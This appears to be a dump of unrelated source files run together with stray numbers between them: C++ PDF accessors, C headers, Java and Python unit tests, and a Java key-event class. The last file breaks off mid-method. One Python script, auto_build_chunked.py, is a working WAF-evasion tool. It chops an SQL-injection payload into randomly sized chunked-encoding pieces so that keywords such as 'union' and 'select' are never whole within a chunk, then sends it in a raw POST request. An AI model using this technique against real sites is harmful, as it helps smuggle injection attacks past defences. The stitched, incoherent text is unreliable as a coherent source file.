bool SkPdfGraphicsStateDictionary::SA(SkPdfNativeDoc* doc) { SkPdfNativeObject* ret = get("SA", ""); if (doc) {ret = doc->resolveReference(ret);} if ((ret != NULL && ret->isBoolean()) || (doc == NULL && ret != NULL && ret->isReference())) return ret->boolValue();
  /* TODO(edisonn): warn about missing default value for optional fields */ return false; }
bool SkPdfGraphicsStateDictionary::has_SA() const { return get("SA", "") != NULL; }

// "BM" (name or array).
bool SkPdfGraphicsStateDictionary::isBMAName(SkPdfNativeDoc* doc) { SkPdfNativeObject* ret = get("BM", ""); if (doc) {ret = doc->resolveReference(ret);} return ret != NULL && ret->isName(); }
SkString SkPdfGraphicsStateDictionary::getBMAsName(SkPdfNativeDoc* doc) { SkPdfNativeObject* ret = get("BM", ""); if (doc) {ret = doc->resolveReference(ret);} if ((ret != NULL && ret->isName()) || (doc == NULL && ret != NULL && ret->isReference())) return ret->nameValue2();
  /* TODO(edisonn): warn about missing default value for optional fields */ return SkString(); }
bool SkPdfGraphicsStateDictionary::isBMAArray(SkPdfNativeDoc* doc) { SkPdfNativeObject* ret = get("BM", ""); if (doc) {ret = doc->resolveReference(ret);} return ret != NULL && ret->isArray(); }
SkPdfArray* SkPdfGraphicsStateDictionary::getBMAsArray(SkPdfNativeDoc* doc) { SkPdfNativeObject* ret = get("BM", ""); if (doc) {ret = doc->resolveReference(ret);} if ((ret != NULL && ret->isArray()) || (doc == NULL && ret != NULL && ret->isReference())) return (SkPdfArray*)ret;
  /* TODO(edisonn): warn about missing default value for optional fields */ return NULL; }
bool SkPdfGraphicsStateDictionary::has_BM() const { return get("BM", "") != NULL; }

// "SMask" (dictionary or name).
bool SkPdfGraphicsStateDictionary::isSMaskADictionary(SkPdfNativeDoc* doc) { SkPdfNativeObject* ret = get("SMask", ""); if (doc) {ret = doc->resolveReference(ret);} return ret != NULL && ret->isDictionary(); }
SkPdfDictionary* SkPdfGraphicsStateDictionary::getSMaskAsDictionary(SkPdfNativeDoc* doc) { SkPdfNativeObject* ret = get("SMask", ""); if (doc) {ret = doc->resolveReference(ret);} if ((ret != NULL && ret->isDictionary()) || (doc == NULL && ret != NULL && ret->isReference())) return (SkPdfDictionary*)ret;
  /* TODO(edisonn): warn about missing default value for optional fields */ return NULL; }
bool SkPdfGraphicsStateDictionary::isSMaskAName(SkPdfNativeDoc* doc) { SkPdfNativeObject* ret = get("SMask", ""); if (doc) {ret = doc->resolveReference(ret);} return ret != NULL && ret->isName(); }
SkString SkPdfGraphicsStateDictionary::getSMaskAsName(SkPdfNativeDoc* doc) { SkPdfNativeObject* ret = get("SMask", ""); if (doc) {ret = doc->resolveReference(ret);} if ((ret != NULL && ret->isName()) || (doc == NULL && ret != NULL && ret->isReference())) return ret->nameValue2();
  /* TODO(edisonn): warn about missing default value for optional fields */ return SkString(); }
bool SkPdfGraphicsStateDictionary::has_SMask() const { return get("SMask", "") != NULL; }

// "CA" and lowercase "ca" (number entries).
double SkPdfGraphicsStateDictionary::CA(SkPdfNativeDoc* doc) { SkPdfNativeObject* ret = get("CA", ""); if (doc) {ret = doc->resolveReference(ret);} if ((ret != NULL && ret->isNumber()) || (doc == NULL && ret != NULL && ret->isReference())) return ret->numberValue();
  /* TODO(edisonn): warn about missing default value for optional fields */ return 0; }
bool SkPdfGraphicsStateDictionary::has_CA() const { return get("CA", "") != NULL; }
double SkPdfGraphicsStateDictionary::ca(SkPdfNativeDoc* doc) { SkPdfNativeObject* ret = get("ca", ""); if (doc) {ret = doc->resolveReference(ret);} if ((ret != NULL && ret->isNumber()) || (doc == NULL && ret != NULL && ret->isReference())) return ret->numberValue();
  /* TODO(edisonn): warn about missing default value for optional fields */ return 0; }
bool SkPdfGraphicsStateDictionary::has_ca() const { return get("ca", "") != NULL; }

// "AIS" (boolean entry).
bool SkPdfGraphicsStateDictionary::AIS(SkPdfNativeDoc* doc) { SkPdfNativeObject* ret = get("AIS", ""); if (doc) {ret = doc->resolveReference(ret);} if ((ret != NULL && ret->isBoolean()) || (doc == NULL && ret != NULL && ret->isReference())) return ret->boolValue();
  /* TODO(edisonn): warn about missing default value for optional fields */ return false; }
bool SkPdfGraphicsStateDictionary::has_AIS() const { return get("AIS", "") != NULL; }

// "TK" (boolean entry).
bool SkPdfGraphicsStateDictionary::TK(SkPdfNativeDoc* doc) { SkPdfNativeObject* ret = get("TK", ""); if (doc) {ret = doc->resolveReference(ret);} if ((ret != NULL && ret->isBoolean()) || (doc == NULL && ret != NULL && ret->isReference())) return ret->boolValue();
  /* TODO(edisonn): warn about missing default value for optional fields */ return false; }
bool SkPdfGraphicsStateDictionary::has_TK() const { return get("TK", "") != NULL; }
6,708
2,508
<gh_stars>1000+ extern zend_class_entry *stub_oo_extend_exception_ce; ZEPHIR_INIT_CLASS(Stub_Oo_Extend_Exception);
55
333
#ifndef RS_FILE_OPENDIR_HPP #define RS_FILE_OPENDIR_HPP #include "rodsConnect.h" #include "fileOpendir.h" int rsFileOpendir( rsComm_t *rsComm, fileOpendirInp_t *fileOpendirInp ); int _rsFileOpendir( rsComm_t *rsComm, fileOpendirInp_t *fileOpendirInp, void **dirPtr ); int remoteFileOpendir( rsComm_t *rsComm, fileOpendirInp_t *fileOpendirInp, rodsServerHost_t *rodsServerHost ); #endif
168
544
package com.patloew.rxlocation;

import android.app.Activity;
import android.content.Intent;
import android.content.IntentSender;

import com.google.android.gms.common.api.Status;

import org.junit.Before;
import org.junit.Test;
import org.junit.runner.RunWith;
import org.mockito.Mock;
import org.mockito.MockitoAnnotations;
import org.powermock.api.mockito.PowerMockito;
import org.powermock.core.classloader.annotations.PrepareOnlyThisForTest;
import org.powermock.modules.junit4.PowerMockRunner;

import java.util.UUID;

import static org.mockito.Mockito.doAnswer;
import static org.mockito.Mockito.doReturn;
import static org.mockito.Mockito.doThrow;
import static org.mockito.Mockito.verify;
import static org.powermock.api.mockito.PowerMockito.spy;

/**
 * Unit tests for {@link LocationSettingsActivity}: intent handling, the
 * resolution flow started via {@link Status#startResolutionForResult}, and
 * how resolution results are reported back through
 * {@link SettingsCheckHandleSingleOnSubscribe#onResolutionResult}.
 */
@RunWith(PowerMockRunner.class)
@PrepareOnlyThisForTest({ SettingsCheckHandleSingleOnSubscribe.class, Status.class })
public class LocationSettingsActivityTest {

    @Mock Status status;
    @Mock Intent intent;

    LocationSettingsActivity activity;

    final String observableId = UUID.randomUUID().toString();

    @Before
    public void setup() throws Exception {
        MockitoAnnotations.initMocks(this);
        PowerMockito.spy(SettingsCheckHandleSingleOnSubscribe.class);

        // Spy on a real activity so we can stub/verify its own methods.
        activity = spy(new LocationSettingsActivity());

        doReturn(observableId).when(intent).getStringExtra(LocationSettingsActivity.ARG_ID);
        doReturn(status).when(intent).getParcelableExtra(LocationSettingsActivity.ARG_STATUS);
        doReturn(intent).when(activity).getIntent();
    }

    @Test
    public void onCreate() {
        // FIX: stub handleIntent() BEFORE invoking onCreate(). Stubbing a spy
        // after the call has already executed does nothing — the original test
        // let the real handleIntent() run and only then installed the stub.
        doAnswer(invocation -> null).when(activity).handleIntent();

        activity.onCreate(null);

        verify(activity).handleIntent();
    }

    @Test
    public void onNewIntent() {
        // FIX: same stub-before-invocation ordering as onCreate().
        doAnswer(invocation -> null).when(activity).handleIntent();

        activity.onNewIntent(intent);

        verify(activity).setIntent(intent);
        verify(activity).handleIntent();
    }

    @Test
    public void handleIntent() throws IntentSender.SendIntentException {
        activity.handleIntent();

        verify(status).startResolutionForResult(activity, LocationSettingsActivity.REQUEST_CODE_RESOLUTION);
    }

    @Test
    public void handleIntent_SendIntentException() throws IntentSender.SendIntentException {
        doThrow(new IntentSender.SendIntentException()).when(status)
                .startResolutionForResult(activity, LocationSettingsActivity.REQUEST_CODE_RESOLUTION);

        // Only asserts that the exception is swallowed (no crash).
        activity.handleIntent();
    }

    @Test
    public void onActivityResult() {
        activity.onActivityResult(LocationSettingsActivity.REQUEST_CODE_RESOLUTION, Activity.RESULT_OK, null);

        verify(activity).setResolutionResultAndFinish(Activity.RESULT_OK);
    }

    @Test
    public void onActivityResult_wrongRequestCode() {
        // An unknown request code must be reported as CANCELED.
        activity.onActivityResult(-123, Activity.RESULT_OK, null);

        verify(activity).setResolutionResultAndFinish(Activity.RESULT_CANCELED);
    }

    @Test
    public void setResolutionResultAndFinish_OK() {
        activity.setResolutionResultAndFinish(Activity.RESULT_OK);

        PowerMockito.verifyStatic(SettingsCheckHandleSingleOnSubscribe.class);
        SettingsCheckHandleSingleOnSubscribe.onResolutionResult(observableId, Activity.RESULT_OK);
        verify(activity).finish();
    }

    @Test
    public void setResolutionResultAndFinish_Canceled() {
        activity.setResolutionResultAndFinish(Activity.RESULT_CANCELED);

        PowerMockito.verifyStatic(SettingsCheckHandleSingleOnSubscribe.class);
        SettingsCheckHandleSingleOnSubscribe.onResolutionResult(observableId, Activity.RESULT_CANCELED);
        verify(activity).finish();
    }
}
1,310
679
<reponame>Grosskopf/openoffice<gh_stars>100-1000
/**************************************************************
 *
 * Licensed to the Apache Software Foundation (ASF) under one
 * or more contributor license agreements.  See the NOTICE file
 * distributed with this work for additional information
 * regarding copyright ownership.  The ASF licenses this file
 * to you under the Apache License, Version 2.0 (the
 * "License"); you may not use this file except in compliance
 * with the License.  You may obtain a copy of the License at
 *
 *   http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing,
 * software distributed under the License is distributed on an
 * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
 * KIND, either express or implied.  See the License for the
 * specific language governing permissions and limitations
 * under the License.
 *
 *************************************************************/

#ifndef INCLUDED_DRAWINGLAYER_PRIMITIVE2D_MARKERARRAYPRIMITIVE2D_HXX
#define INCLUDED_DRAWINGLAYER_PRIMITIVE2D_MARKERARRAYPRIMITIVE2D_HXX

#include <drawinglayer/drawinglayerdllapi.h>
#include <drawinglayer/primitive2d/baseprimitive2d.hxx>
#include <basegfx/color/bcolor.hxx>
#include <vcl/bitmapex.hxx>

//////////////////////////////////////////////////////////////////////////////
// MarkerArrayPrimitive2D class

namespace drawinglayer
{
    namespace primitive2d
    {
        /** MarkerArrayPrimitive2D class

            This primitive defines an array of markers. Their size is defined
            in pixels and independent from the view transformation which makes
            this primitive highly view-dependent. It is also transformation
            invariant, so that the bitmap is always visualized unscaled and
            unrotated. It is used e.g. for grid position visualisation. The
            given Bitmap (with transparence) is defined to be visible centered
            at each of the given positions. It decomposes to the needed number
            of BitmapPrimitive2D's, so it would be efficient to handle it
            directly in a renderer.
         */
        class DRAWINGLAYER_DLLPUBLIC MarkerArrayPrimitive2D : public BufferedDecompositionPrimitive2D
        {
        private:
            /// the positions for the marker
            std::vector< basegfx::B2DPoint >        maPositions;

            /// the marker definition to visualize
            BitmapEx                                maMarker;

        protected:
            /// create local decomposition
            virtual Primitive2DSequence create2DDecomposition(const geometry::ViewInformation2D& rViewInformation) const;

        public:
            /// constructor
            MarkerArrayPrimitive2D(
                const std::vector< basegfx::B2DPoint >& rPositions,
                const BitmapEx& rMarker);

            /// data read access
            const std::vector< basegfx::B2DPoint >& getPositions() const { return maPositions; }
            const BitmapEx& getMarker() const { return maMarker; }

            /// compare operator
            virtual bool operator==(const BasePrimitive2D& rPrimitive) const;

            /// get range
            virtual basegfx::B2DRange getB2DRange(const geometry::ViewInformation2D& rViewInformation) const;

            /// provide unique ID
            /// (NOTE(review): macro name typo "Primitrive" is upstream API — do not "fix" locally)
            DeclPrimitrive2DIDBlock()
        };
    } // end of namespace primitive2d
} // end of namespace drawinglayer

//////////////////////////////////////////////////////////////////////////////

#endif //INCLUDED_DRAWINGLAYER_PRIMITIVE2D_MARKERARRAYPRIMITIVE2D_HXX

//////////////////////////////////////////////////////////////////////////////
// eof
1,157
634
<filename>server/data/data-jmap-cassandra/src/test/java/org/apache/james/jmap/cassandra/filtering/DTOTest.java<gh_stars>100-1000 /**************************************************************** * Licensed to the Apache Software Foundation (ASF) under one * * or more contributor license agreements. See the NOTICE file * * distributed with this work for additional information * * regarding copyright ownership. The ASF licenses this file * * to you under the Apache License, Version 2.0 (the * * "License"); you may not use this file except in compliance * * with the License. You may obtain a copy of the License at * * * * http://www.apache.org/licenses/LICENSE-2.0 * * * * Unless required by applicable law or agreed to in writing, * * software distributed under the License is distributed on an * * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY * * KIND, either express or implied. See the License for the * * specific language governing permissions and limitations * * under the License. 
* ****************************************************************/ package org.apache.james.jmap.cassandra.filtering; import static org.apache.james.jmap.api.filtering.RuleFixture.RULE_1; import static org.apache.james.jmap.api.filtering.RuleFixture.RULE_2; import static org.apache.james.jmap.api.filtering.RuleFixture.RULE_FROM; import static org.apache.james.jmap.api.filtering.RuleFixture.RULE_RECIPIENT; import static org.apache.james.jmap.api.filtering.RuleFixture.RULE_SUBJECT; import static org.apache.james.jmap.api.filtering.RuleFixture.RULE_TO; import static org.apache.james.jmap.cassandra.filtering.FilteringRuleSetDefineDTOModules.FILTERING_RULE_SET_DEFINED; import org.apache.james.JsonSerializationVerifier; import org.apache.james.core.Username; import org.apache.james.eventsourcing.EventId; import org.apache.james.jmap.api.filtering.impl.FilteringAggregateId; import org.apache.james.jmap.api.filtering.impl.RuleSetDefined; import org.apache.james.util.ClassLoaderUtils; import org.junit.jupiter.api.Test; import com.google.common.collect.ImmutableList; class DTOTest { static final String EVENT_JSON = ClassLoaderUtils.getSystemResourceAsString("json/event.json"); static final String EVENT_EMPTY_JSON = ClassLoaderUtils.getSystemResourceAsString("json/eventEmpty.json"); static final String EVENT_COMPLEX_JSON = ClassLoaderUtils.getSystemResourceAsString("json/eventComplex.json"); static final RuleSetDefined SIMPLE_RULE = new RuleSetDefined( new FilteringAggregateId(Username.of("Bart")), EventId.first(), ImmutableList.of(RULE_1, RULE_2)); static final RuleSetDefined EMPTY_RULE = new RuleSetDefined( new FilteringAggregateId(Username.of("Bart")), EventId.first(), ImmutableList.of()); static final RuleSetDefined COMPLEX_RULE = new RuleSetDefined( new FilteringAggregateId(Username.of("Bart")), EventId.first(), ImmutableList.of(RULE_FROM, RULE_RECIPIENT, RULE_SUBJECT, RULE_TO)); @Test void shouldSerializeRule() throws Exception { 
JsonSerializationVerifier.dtoModule(FILTERING_RULE_SET_DEFINED) .testCase(EMPTY_RULE, EVENT_EMPTY_JSON) .testCase(SIMPLE_RULE, EVENT_JSON) .testCase(COMPLEX_RULE, EVENT_COMPLEX_JSON) .verify(); } }
1,485
379
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# @Time    : 2019/3/9 10:21 PM
# @Author  : w8ay
# @File    : auto_build_chunked.py
# Build an HTTP "Transfer-Encoding: chunked" body from a payload, choosing
# chunk boundaries so that no single chunk contains any of the given
# keywords (a WAF-evasion technique).
import random
import string


def chunk_data(data, keywords: list):
    """Encode *data* as an HTTP chunked transfer-coded body.

    Chunks get a random size of 1-9 bytes; if a candidate chunk contains one
    of *keywords*, it is shrunk until it no longer does.  The size is floored
    at 1 byte: the original code could decrement to 0 when fed a keyword that
    matches a single character, which both emitted a premature ``0``-size
    terminating chunk and stopped advancing ``index`` (infinite loop).

    :param data: payload string to split.
    :param keywords: substrings that must not appear whole inside any chunk.
    :return: chunked body ending with the terminating ``0\\r\\n\\r\\n`` chunk.
    """
    dl = len(data)
    ret = ""
    index = 0
    while index < dl:
        chunk_size = random.randint(1, 9)
        if index + chunk_size >= dl:
            chunk_size = dl - index
        # Random chunk-extension token, varies the wire format per chunk.
        salt = ''.join(random.sample(string.ascii_letters + string.digits, 5))
        while True:
            tmp_chunk = data[index:index + chunk_size]
            if chunk_size <= 1:
                # Cannot split a single byte any further; emit it as-is so we
                # always make progress and never produce a 0-size chunk.
                break
            if not any(k in tmp_chunk for k in keywords):
                break
            chunk_size -= 1
        index += chunk_size
        ret += "{0};{1}\r\n".format(hex(chunk_size)[2:], salt)
        ret += "{0}\r\n".format(tmp_chunk)
    ret += "0\r\n\r\n"
    return ret


def main():
    """Demo: send a chunked SQLi-style payload to httpbin.org."""
    # Third-party dependency, imported lazily so chunk_data() stays importable
    # (and nothing hits the network) when this file is used as a module.
    import HackRequests

    payload = "id=-1' and union select user(),2,3,4,5 from table"
    keywords = ['and', 'union', 'select', 'user', 'from']
    data = chunk_data(payload, keywords)

    raw = '''
POST /post HTTP/1.1
Host: httpbin.org
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Transfer-Encoding: Chunked

{}
'''.format(data)

    hack = HackRequests.hackRequests()
    r = hack.httpraw(raw)
    print(raw)
    print(r.text())
    print(r.log)


if __name__ == '__main__':
    main()
908
1,131
// Licensed to the Apache Software Foundation (ASF) under one // or more contributor license agreements. See the NOTICE file // distributed with this work for additional information // regarding copyright ownership. The ASF licenses this file // to you under the Apache License, Version 2.0 (the // "License"); you may not use this file except in compliance // with the License. You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, // software distributed under the License is distributed on an // "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY // KIND, either express or implied. See the License for the // specific language governing permissions and limitations // under the License. package common; import java.awt.event.KeyEvent; import java.awt.event.KeyListener; import streamer.BaseElement; import streamer.ByteBuffer; public class AwtKeyEventSource extends BaseElement implements KeyListener { public AwtKeyEventSource(String id) { super(id); } @Override public void keyTyped(KeyEvent e) { // Nothing to do } @Override public void keyPressed(KeyEvent e) { sendEvent(e, true); } @Override public void keyReleased(KeyEvent e) { sendEvent(e, false); } private void sendEvent(KeyEvent e, boolean pressed) { ByteBuffer buf = new ByteBuffer(new KeyOrder(e, pressed)); pushDataToAllOuts(buf); } }
471
326
<reponame>tristansgray/simian #!/usr/bin/env python # # Copyright 2018 Google Inc. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS-IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # """client module tests.""" import httplib import logging import sys from pyfakefs import fake_filesystem import M2Crypto import mock import stubout from google.apputils import app from google.apputils import basetest from simian import auth from simian.client import client class ClientModuleTest(basetest.TestCase): """Test the client module.""" def testConstants(self): for a in [ 'SERVER_HOSTNAME', 'SERVER_PORT', 'AUTH_DOMAIN', 'CLIENT_SSL_PATH', 'SEEK_SET', 'SEEK_CUR', 'SEEK_END', 'DEBUG', 'URL_UPLOADPKG']: self.assertTrue(hasattr(client, a)) class MultiBodyConnectionTest(basetest.TestCase): """Test MultiBodyConnection class.""" def setUp(self): super(MultiBodyConnectionTest, self).setUp() self.stubs = stubout.StubOutForTesting() self.mbc = client.MultiBodyConnection() def tearDown(self): super(MultiBodyConnectionTest, self).tearDown() self.stubs.UnsetAll() def testSetProgressCallback(self): """Test SetProgressCallback().""" fn = lambda x: 1 self.assertFalse(hasattr(self.mbc, '_progress_callback')) self.mbc.SetProgressCallback(fn) self.assertEqual(self.mbc._progress_callback, fn) self.assertRaises( client.Error, self.mbc.SetProgressCallback, 1) def testProgressCallback(self): """Test _ProgressCallback().""" self.mbc._ProgressCallback(1, 2) self.mbc._progress_callback = mock.Mock() self.mbc._ProgressCallback(1, 2) 
self.mbc._progress_callback.assert_called_with(1, 2) @mock.patch.object(client.httplib.HTTPConnection, 'request') def testRequest(self, mock_request): """Test request().""" fs = fake_filesystem.FakeFilesystem() fake_os = fake_filesystem.FakeOsModule(fs) fake_open = fake_filesystem.FakeFileOpen(fs) file_name = '/f1' file_size = 10000 f_body = 'x' * file_size fs.CreateFile(file_name, contents=f_body) fake_file = fake_open(file_name, 'r') self.stubs.Set(client, 'os', fake_os) method = 'GET' url = '/foo' body = ['hello', fake_file] content_length = len(body[0]) + file_size headers = { 'Content-Length': content_length, } self.mbc._is_https = False self.mbc.send = mock.Mock() self.mbc._ProgressCallback = mock.Mock() inorder_calls = mock.Mock() inorder_calls.attach_mock(mock_request, 'request') inorder_calls.attach_mock(self.mbc.send, 'send') inorder_calls.attach_mock(self.mbc._ProgressCallback, '_ProgressCallback') self.mbc.request(method, url, body=body) inorder_calls.assert_has_calls([ mock.call.request(self.mbc, method, url, headers=headers), mock.call._ProgressCallback(0, content_length), mock.call.send(body[0]), mock.call._ProgressCallback(len(body[0]), content_length), mock.call.send(f_body[:8192]), mock.call._ProgressCallback(len(body[0]) + 8192, content_length), mock.call.send(f_body[8192:]), mock.call._ProgressCallback(len(body[0]) + file_size, content_length), mock.call._ProgressCallback(len(body[0]) + file_size, content_length)]) class HTTPSMultiBodyConnectionTest(basetest.TestCase): def setUp(self): self.stubs = stubout.StubOutForTesting() self.hostname = 'foohost' self.mbc = client.HTTPSMultiBodyConnection(self.hostname) def tearDown(self): self.stubs.UnsetAll() def testParentClassRequestAssumption(self): """Test assumptions of parent class request().""" method = 'GET' url = '/foo' body = None headers = {} with mock.patch.object( client.httplib.HTTPConnection, '_send_request', return_value=-1) as mock_fn: c = client.httplib.HTTPConnection(self.hostname) 
self.assertEqual(None, c.request(method, url)) mock_fn.assert_called_once_with(method, url, body, headers) @mock.patch.object(client.httplib.HTTPConnection, 'send', autospec=True) @mock.patch.object(client.httplib.HTTPConnection, 'endheaders') @mock.patch.object(client.httplib.HTTPConnection, 'putheader') @mock.patch.object(client.httplib.HTTPConnection, 'putrequest') def testParentClassSendRequestAssumptionEmptyBody( self, putrequest_mock, putheader_mock, endheaders_mock, send_mock): """Test assumptions of parent class _send_request().""" method = 'GET' url = '/foo' body1 = None headers = {'foo': 'bar'} inorder_calls = mock.Mock() inorder_calls.attach_mock(putrequest_mock, 'putrequest') inorder_calls.attach_mock(putheader_mock, 'putheader') inorder_calls.attach_mock(endheaders_mock, 'endheaders') inorder_calls.attach_mock(send_mock, 'send') # with a None body supplied, send() is never called. on >=2.7 # endheaders is still called with the body contents, even if they # are None. c = client.httplib.HTTPConnection(self.hostname) c._send_request(method, url, body1, headers) expected = [ mock.call.putrequest(method, url), mock.call.putheader('foo', headers['foo']) ] if sys.version_info[0] >= 2 and sys.version_info[1] >= 7: expected.append(mock.call.endheaders(body1)) else: expected.append(mock.call.endheaders()) inorder_calls.assert_has_calls(expected) @mock.patch.object(client.httplib.HTTPConnection, 'send', autospec=True) @mock.patch.object(client.httplib.HTTPConnection, 'endheaders') @mock.patch.object(client.httplib.HTTPConnection, 'putheader') @mock.patch.object(client.httplib.HTTPConnection, 'putrequest') def testParentClassSendRequestAssumption( self, putrequest_mock, putheader_mock, endheaders_mock, send_mock): """Test assumptions of parent class _send_request().""" method = 'GET' url = '/foo' body2 = 'howdy' headers = {'foo': 'bar'} inorder_calls = mock.Mock() inorder_calls.attach_mock(putrequest_mock, 'putrequest') inorder_calls.attach_mock(putheader_mock, 
'putheader') inorder_calls.attach_mock(endheaders_mock, 'endheaders') inorder_calls.attach_mock(send_mock, 'send') # with a body supplied, send() is called inside _send_request() on # httplib < 2.6. in >=2.7 endheaders() sends the body and headers # all at once. expected = [ mock.call.putrequest(method, url), mock.call.putheader('Content-Length', str(len(body2))), mock.call.putheader('foo', headers['foo']) ] if sys.version_info[0] >= 2 and sys.version_info[1] >= 7: expected.append(mock.call.endheaders(body2)) else: expected.append(mock.call.endheaders()) expected.append(mock.send(body2)) c = client.httplib.HTTPConnection(self.hostname) c._send_request(method, url, body2, headers) inorder_calls.assert_has_calls(expected) def testDirectSendTypes(self): """Test the DIRECT_SEND_TYPES constant for sane values.""" self.assertTrue(type(self.mbc.DIRECT_SEND_TYPES) is list) @mock.patch.object(client.httplib.HTTPConnection, 'request') @mock.patch.object(client.httplib.HTTPConnection, 'send') def testRequestSimple(self, mock_send, mock_request): """Test request with one body element.""" method = 'GET' url = '/foo' body = 'hello' headers = { 'Content-Length': len(body), 'Host': self.hostname, } self.mbc.request(method, url, body=body) mock_request.assert_called_once_with( self.mbc, method, url, headers=headers) mock_send.assert_called_once_with(body) @mock.patch.object(client.httplib.HTTPConnection, 'request') @mock.patch.object(client.httplib.HTTPConnection, 'send') def testRequestMultiString(self, send_mock, request_mock): """Test request() with multiple body string elements.""" method = 'GET' url = '/foo' body = ['hello', 'there'] headers = { 'Content-Length': sum(map(len, body)), 'Host': self.hostname, } for s in body: client.httplib.HTTPConnection.send(s).AndReturn(None) self.mbc.request(method, url, body=body) request_mock.assert_called_once_with(self.mbc, method, url, headers=headers) send_mock.assert_has_calls([mock.call(x) for x in body]) 
@mock.patch.object(client.httplib.HTTPConnection, 'send') @mock.patch.object(client.httplib.HTTPConnection, 'request') def testRequestMultiMixed(self, request_mock, send_mock): """Test request() with multiple mixed body elements.""" filepath = '/somefilename' f_body = 'there' fs = fake_filesystem.FakeFilesystem() fs.CreateFile(filepath, contents=f_body) fake_open = fake_filesystem.FakeFileOpen(fs) f = fake_open(filepath) method = 'GET' url = '/foo' body = ['hello', f] content_length = len(body[0]) + len(f_body) headers = { 'Content-Length': content_length, 'Host': self.hostname, } self.mbc.request(method, url, body=body) request_mock.assert_called_once_with(self.mbc, method, url, headers=headers) self.assertEqual(2, send_mock.call_count) send_mock.assert_has_calls([mock.call(body[0]), mock.call(f_body)]) def testSetCACertChain(self): """Test SetCACertChain().""" self.mbc.SetCACertChain('foo') self.assertEqual(self.mbc._ca_cert_chain, 'foo') def testIsValidCert(self): """Test _IsValidCert().""" self.assertEqual(1, self.mbc._IsValidCert(1, 1)) def testIsValidCertOkZero(self): """Test _IsValidCert().""" cert = mock.create_autospec(M2Crypto.X509.X509) cert_subject = mock.create_autospec(M2Crypto.X509.X509_Name) store = mock.create_autospec(M2Crypto.X509.X509_Store_Context) store.get_current_cert.return_value = cert cert.get_subject.return_value = cert_subject cert_subject.__str__.return_value = 'valid' self.assertEqual(0, self.mbc._IsValidCert(0, store)) cert_subject.__str__.assert_called() @mock.patch.object(client.tempfile, 'NamedTemporaryFile', autospec=True) def testLoadCACertChain(self, named_temporary_file_mock): """Test _LoadCACertChain().""" temp_filepath = '/tmp/somefilename' fs = fake_filesystem.FakeFilesystem() fs.CreateFile(temp_filepath) fake_open = fake_filesystem.FakeFileOpen(fs) tf = fake_open(temp_filepath, 'w') named_temporary_file_mock.return_value = tf ctx = mock.create_autospec(M2Crypto.SSL.Context) ctx.load_verify_locations.return_value = 1 
cert_chain = 'cert chain la la ..' self.mbc._ca_cert_chain = cert_chain self.mbc._LoadCACertChain(ctx) self.assertEqual(cert_chain, fake_open(temp_filepath, 'r').read()) # mock 2.0.0 incorrectly binds spec to calls ctx._spec_signature = None ctx.assert_has_calls([ mock.call.load_verify_locations(cafile=tf.name), mock.call.set_verify( client.SSL.verify_peer | client.SSL.verify_fail_if_no_peer_cert, depth=9, callback=self.mbc._IsValidCert)]) @mock.patch.object(client.tempfile, 'NamedTemporaryFile', autospec=True) def testLoadCACertChainWhenLoadError(self, named_temporary_file_mock): """Test _LoadCACertChain().""" temp_filepath = '/tmp/somefilename' fs = fake_filesystem.FakeFilesystem() fs.CreateFile(temp_filepath) fake_open = fake_filesystem.FakeFileOpen(fs) tf = fake_open(temp_filepath, 'w') named_temporary_file_mock.return_value = tf cert_chain = 'cert chain la la ..' self.mbc._ca_cert_chain = cert_chain ctx = mock.create_autospec(M2Crypto.SSL.Context) self.assertRaises( client.SimianClientError, self.mbc._LoadCACertChain, ctx) ctx.load_verify_locations.assert_called_once_with(cafile=tf.name) self.assertEqual(cert_chain, fake_open(temp_filepath, 'r').read()) def testLoadCACertChainWhenNone(self): """Test _LoadCACertChain().""" self.assertRaises( client.SimianClientError, self.mbc._LoadCACertChain, mock.MagicMock()) @mock.patch.object(client.SSL, 'Context', autospec=True) @mock.patch.object(client.SSL, 'Connection', autospec=True) def testConnect(self, connection_mock, context_mock): """Test connect().""" context = context_mock() conn = connection_mock(context) connection_mock.reset_mock() context_mock.reset_mock() self.mbc._ca_cert_chain = 'cert chain foo' context_mock.return_value = context connection_mock.return_value = conn with mock.patch.object(self.mbc, '_LoadCACertChain') as load_ca_chain_mock: self.mbc.connect() self.assertEqual(self.mbc.sock, conn) load_ca_chain_mock.assert_called_once_with(context) context_mock.assert_called_once_with(client._SSL_VERSION) 
connection_mock.assert_called_once_with(context) conn.connect.assert_called_once_with((self.mbc.host, self.mbc.port)) if client._CIPHER_LIST: context.assert_has_calls([mock.call.set_cipher_list(client._CIPHER_LIST)]) def testConnectWhenNoCACertChain(self): """Test connect().""" context = mock.create_autospec(M2Crypto.SSL.Context) with mock.patch.object(client.SSL, 'Context', return_value=context): self.assertRaises(client.SimianClientError, self.mbc.connect) if client._CIPHER_LIST: context.assert_has_calls( [mock.call.set_cipher_list(client._CIPHER_LIST)]) class HttpsClientTest(basetest.TestCase): """Test HttpsClient class.""" def setUp(self): super(HttpsClientTest, self).setUp() self.stubs = stubout.StubOutForTesting() self.hostname = 'hostname' self.port = None self.client = client.HttpsClient(self.hostname) def tearDown(self): super(HttpsClientTest, self).tearDown() self.stubs.UnsetAll() @mock.patch.object(client.HttpsClient, '_LoadHost') def testInit(self, mock_lh): """Test __init__().""" i = client.HttpsClient(self.hostname) self.assertEqual(i._progress_callback, None) self.assertEqual(i._ca_cert_chain, None) mock_lh.assert_called_once_with(self.hostname, None, None) def testLoadHost(self): """Test 